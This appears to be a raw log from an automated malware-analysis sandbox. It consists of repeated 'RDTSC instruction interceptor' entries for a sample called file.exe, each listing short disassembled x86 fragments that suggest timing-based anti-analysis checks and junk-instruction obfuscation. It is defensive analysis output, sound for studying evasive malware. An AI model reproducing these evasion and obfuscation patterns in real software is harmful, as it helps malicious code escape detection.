Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54F010 second address: 54F016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54F016 second address: 54F046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F40B515FC06h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F40B515FC00h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A272 second address: 55A28B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jl 00007F40B477E794h 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007F40B477E786h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A2ED second address: 55A2F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A2F3 second address: 55A3A3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F40B477E788h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov di, 327Ah 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007F40B477E788h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 00000017h 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f push 86692ABCh 0x00000034 jmp 00007F40B477E797h 0x00000039 add dword ptr [esp], 7996D5C4h 0x00000040 add edx, dword ptr [ebp+122D38E9h] 0x00000046 push 00000003h 0x00000048 or dword ptr [ebp+122D3755h], esi 0x0000004e push 00000000h 0x00000050 jmp 00007F40B477E799h 0x00000055 push 00000003h 0x00000057 call 00007F40B477E790h 0x0000005c jmp 00007F40B477E78Ch 0x00000061 pop ecx 0x00000062 movzx edi, si 0x00000065 push 89954B9Fh 0x0000006a je 00007F40B477E794h 0x00000070 pushad 0x00000071 push eax 0x00000072 push edx 0x00000073 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A3A3 second address: 55A3D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F40B515FBF6h 0x0000000a popad 0x0000000b xor dword ptr [esp], 49954B9Fh 0x00000012 mov di, 5CECh 0x00000016 call 00007F40B515FBFBh 0x0000001b mov ecx, edx 0x0000001d pop edi 0x0000001e lea ebx, dword ptr [ebp+1244F1B3h] 0x00000024 xchg eax, ebx 0x00000025 jnl 00007F40B515FBFEh 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A508 second address: 55A522 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jne 00007F40B477E786h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jno 00007F40B477E788h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A522 second address: 55A539 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FBFCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A539 second address: 55A53E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A639 second address: 55A63E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A63E second address: 55A693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F40B477E788h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov ecx, dword ptr [ebp+122D37EDh] 0x0000002a push 00000000h 0x0000002c sub dword ptr [ebp+122D3433h], esi 0x00000032 jne 00007F40B477E78Ah 0x00000038 call 00007F40B477E789h 0x0000003d jnp 00007F40B477E794h 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A693 second address: 55A6A2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F40B515FBF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A6A2 second address: 55A6B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop esi 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F40B477E788h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A6B6 second address: 55A6EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F40B515FBF6h 0x00000009 jmp 00007F40B515FC01h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [eax] 0x00000013 push edx 0x00000014 jng 00007F40B515FBFCh 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A6EC second address: 55A6F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A6F1 second address: 55A799 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F40B515FC0Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b movsx esi, si 0x0000000e movzx edx, di 0x00000011 push 00000003h 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F40B515FBF8h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d sub dword ptr [ebp+122D1DF0h], esi 0x00000033 jmp 00007F40B515FC07h 0x00000038 push 00000000h 0x0000003a mov dword ptr [ebp+122D3515h], edi 0x00000040 push 00000003h 0x00000042 pushad 0x00000043 call 00007F40B515FC04h 0x00000048 mov edx, 6CA795B0h 0x0000004d pop ecx 0x0000004e xor dword ptr [ebp+122D1DF9h], ebx 0x00000054 popad 0x00000055 call 00007F40B515FBF9h 0x0000005a pushad 0x0000005b pushad 0x0000005c jl 00007F40B515FBF6h 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A799 second address: 55A7C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007F40B477E791h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push eax 0x00000017 push edx 0x00000018 push esi 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b pop esi 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A7C1 second address: 55A86D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F40B515FBF8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e pushad 0x0000000f pushad 0x00000010 jmp 00007F40B515FC00h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 jmp 00007F40B515FC08h 0x0000001d popad 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 js 00007F40B515FC06h 0x00000028 je 00007F40B515FC00h 0x0000002e jmp 00007F40B515FBFAh 0x00000033 pop eax 0x00000034 mov dl, cl 0x00000036 lea ebx, dword ptr [ebp+1244F1C7h] 0x0000003c push 00000000h 0x0000003e push ebp 0x0000003f call 00007F40B515FBF8h 0x00000044 pop ebp 0x00000045 mov dword ptr [esp+04h], ebp 0x00000049 add dword ptr [esp+04h], 0000001Ch 0x00000051 inc ebp 0x00000052 push ebp 0x00000053 ret 0x00000054 pop ebp 0x00000055 ret 0x00000056 jmp 00007F40B515FC04h 0x0000005b xchg eax, ebx 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007F40B515FC02h 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55256B second address: 55256F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 577ECA second address: 577ECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57870A second address: 578710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57887F second address: 57889F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B515FBFAh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F40B515FBFDh 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 578A06 second address: 578A0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 578A0F second address: 578A17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 578CDD second address: 578CE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 579A3E second address: 579A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jp 00007F40B515FBFCh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 579BA3 second address: 579BAF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jnl 00007F40B477E786h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 579BAF second address: 579BE8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F40B515FBFCh 0x00000008 jns 00007F40B515FBF6h 0x0000000e je 00007F40B515FC13h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 579BE8 second address: 579BEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 579BEE second address: 579BFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FBFCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57E4FC second address: 57E514 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F40B477E794h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57EC08 second address: 57EC0D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57FE1D second address: 57FE23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57FE23 second address: 57FE27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57FE27 second address: 57FE41 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F40B477E786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jng 00007F40B477E794h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57FE41 second address: 57FE45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57FFA8 second address: 57FFE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F40B477E786h 0x0000000a popad 0x0000000b jmp 00007F40B477E797h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jnc 00007F40B477E796h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 549FDE second address: 549FFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F40B515FC05h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 549FFB second address: 54A002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A002 second address: 54A008 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A008 second address: 54A016 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F40B477E786h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A016 second address: 54A023 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A023 second address: 54A02D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F40B477E786h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5862C0 second address: 5862DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F40B515FC09h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 585873 second address: 5858A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jp 00007F40B477E786h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jno 00007F40B477E78Eh 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push esi 0x0000001a pop esi 0x0000001b jl 00007F40B477E786h 0x00000021 push edi 0x00000022 pop edi 0x00000023 jne 00007F40B477E786h 0x00000029 popad 0x0000002a push edi 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5858A8 second address: 5858AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5858AF second address: 5858BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F40B477E786h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5858BB second address: 5858BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 585E42 second address: 585E46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 585E46 second address: 585E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B515FC07h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 585E67 second address: 585E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 585E6D second address: 585E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 585E71 second address: 585E89 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F40B477E792h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 585E89 second address: 585E8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 587181 second address: 587185 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 587211 second address: 587240 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F40B515FBFCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F40B515FBFCh 0x00000013 mov eax, dword ptr [eax] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F40B515FBFBh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 587240 second address: 587284 instructions: 0x00000000 rdtsc 0x00000002 js 00007F40B477E799h 0x00000008 jmp 00007F40B477E793h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push edi 0x00000014 jmp 00007F40B477E795h 0x00000019 pop edi 0x0000001a pop eax 0x0000001b stc 0x0000001c push D6585ED1h 0x00000021 push ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 587284 second address: 587288 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 587383 second address: 587387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 587387 second address: 5873AD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F40B515FC0Ah 0x0000000c popad 0x0000000d push eax 0x0000000e push ebx 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 587E43 second address: 587E64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F40B477E78Ch 0x0000000b jbe 00007F40B477E786h 0x00000011 popad 0x00000012 push eax 0x00000013 jbe 00007F40B477E7A3h 0x00000019 push eax 0x0000001a push edx 0x0000001b jbe 00007F40B477E786h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 587FB4 second address: 587FD3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F40B515FC05h 0x00000008 jmp 00007F40B515FBFFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 587FD3 second address: 587FD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 587FD7 second address: 587FDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58B8C1 second address: 58B8C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58C06C second address: 58C072 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58E70B second address: 58E733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B477E798h 0x00000009 popad 0x0000000a jmp 00007F40B477E78Bh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58E733 second address: 58E738 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D4C3 second address: 54D4D0 instructions: 0x00000000 rdtsc 0x00000002 je 00007F40B477E786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58ED8C second address: 58ED94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58ED94 second address: 58ED98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58ED98 second address: 58ED9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 594644 second address: 59464E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5937F2 second address: 5937F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59464E second address: 594652 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5937F6 second address: 5937FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 594652 second address: 59469E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 or bx, 93E1h 0x0000000d push 00000000h 0x0000000f jmp 00007F40B477E790h 0x00000014 cmc 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007F40B477E788h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000019h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 mov bh, dh 0x00000033 xchg eax, esi 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 pop eax 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59469E second address: 5946A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5946A2 second address: 5946A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59560C second address: 59566D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F40B515FBF8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F40B515FBF8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 mov di, cx 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edi 0x0000002f call 00007F40B515FBF8h 0x00000034 pop edi 0x00000035 mov dword ptr [esp+04h], edi 0x00000039 add dword ptr [esp+04h], 00000016h 0x00000041 inc edi 0x00000042 push edi 0x00000043 ret 0x00000044 pop edi 0x00000045 ret 0x00000046 push 00000000h 0x00000048 and bx, 9B11h 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 594898 second address: 5948B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E790h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jng 00007F40B477E790h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59566D second address: 595671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
